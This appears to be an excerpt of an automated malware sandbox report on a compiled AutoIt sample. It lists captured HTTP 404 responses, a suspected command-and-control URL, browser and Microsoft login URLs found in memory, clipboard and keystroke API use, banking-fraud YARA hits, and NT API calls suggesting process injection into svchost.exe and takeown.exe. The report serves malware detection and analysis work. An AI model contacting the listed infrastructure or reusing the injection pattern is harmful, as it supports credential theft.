                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:15:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:15:19 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:15:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:15:28 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: D3y5b0UXPl.exe, 00000009.00000002.3667213701.00000000084BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd
                Source: D3y5b0UXPl.exe, 00000009.00000002.3667213701.00000000084BE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd/37iq/
                Source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.0000000006596000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.00000000040E6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nan21.ro
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.0000000006BDE000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.000000000472E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.0000000006BDE000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.000000000472E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002ED6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oau
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002ED6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1592668468.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: takeown.exe, 0000000A.00000003.1591755564.0000000007C95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: takeown.exe, 0000000A.00000003.1592668468.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: takeown.exe, 0000000A.00000002.3659176995.0000000002EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: takeown.exe, 0000000A.00000003.1596230540.0000000007CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B74164
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B74164
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B73F66
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B6001C
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B8CABC

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1412763215.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660621967.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660737432.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1414559541.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3660890231.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3658971513.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1412334229.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3667213701.0000000008450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: This is a third-party compiled AutoIt script.0_2_00B03B3A
                Source: gbdXRnNKkm.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: gbdXRnNKkm.exe, 00000000.00000000.1200109919.0000000000BB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_66865be5-9
                Source: gbdXRnNKkm.exe, 00000000.00000000.1200109919.0000000000BB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_0ee67852-3
                Source: gbdXRnNKkm.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fb1c1184-6
                Source: gbdXRnNKkm.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_22bf530c-a
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0051C253 NtClose,3_2_0051C253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172B60 NtClose,LdrInitializeThunk,3_2_03172B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03172DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031735C0 NtCreateMutant,LdrInitializeThunk,3_2_031735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03174340 NtSetContextThread,3_2_03174340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03174650 NtSuspendThread,3_2_03174650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172B80 NtQueryInformationFile,3_2_03172B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172BA0 NtEnumerateValueKey,3_2_03172BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172BF0 NtAllocateVirtualMemory,3_2_03172BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172BE0 NtQueryValueKey,3_2_03172BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172AB0 NtWaitForSingleObject,3_2_03172AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172AD0 NtReadFile,3_2_03172AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172AF0 NtWriteFile,3_2_03172AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172F30 NtCreateSection,3_2_03172F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172F60 NtCreateProcessEx,3_2_03172F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172F90 NtProtectVirtualMemory,3_2_03172F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172FB0 NtResumeThread,3_2_03172FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172FA0 NtQuerySection,3_2_03172FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172FE0 NtCreateFile,3_2_03172FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172E30 NtWriteVirtualMemory,3_2_03172E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172E80 NtReadVirtualMemory,3_2_03172E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172EA0 NtAdjustPrivilegesToken,3_2_03172EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172EE0 NtQueueApcThread,3_2_03172EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172D10 NtMapViewOfSection,3_2_03172D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172D00 NtSetInformationFile,3_2_03172D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172D30 NtUnmapViewOfSection,3_2_03172D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172DB0 NtEnumerateKey,3_2_03172DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172DD0 NtDelayExecution,3_2_03172DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172C00 NtQueryInformationProcess,3_2_03172C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172C70 NtFreeVirtualMemory,3_2_03172C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172C60 NtCreateKey,3_2_03172C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172CA0 NtQueryInformationToken,3_2_03172CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172CC0 NtQueryVirtualMemory,3_2_03172CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03172CF0 NtOpenProcess,3_2_03172CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03173010 NtOpenDirectoryObject,3_2_03173010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03173090 NtSetValueKey,3_2_03173090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031739B0 NtGetContextThread,3_2_031739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03173D10 NtOpenProcessToken,3_2_03173D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03173D70 NtOpenThread,3_2_03173D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B4340 NtSetContextThread,LdrInitializeThunk,10_2_035B4340
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B4650 NtSuspendThread,LdrInitializeThunk,10_2_035B4650
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2B60 NtClose,LdrInitializeThunk,10_2_035B2B60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_035B2BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_035B2BE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_035B2BA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2AD0 NtReadFile,LdrInitializeThunk,10_2_035B2AD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2AF0 NtWriteFile,LdrInitializeThunk,10_2_035B2AF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2F30 NtCreateSection,LdrInitializeThunk,10_2_035B2F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2FE0 NtCreateFile,LdrInitializeThunk,10_2_035B2FE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2FB0 NtResumeThread,LdrInitializeThunk,10_2_035B2FB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_035B2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_035B2EE0
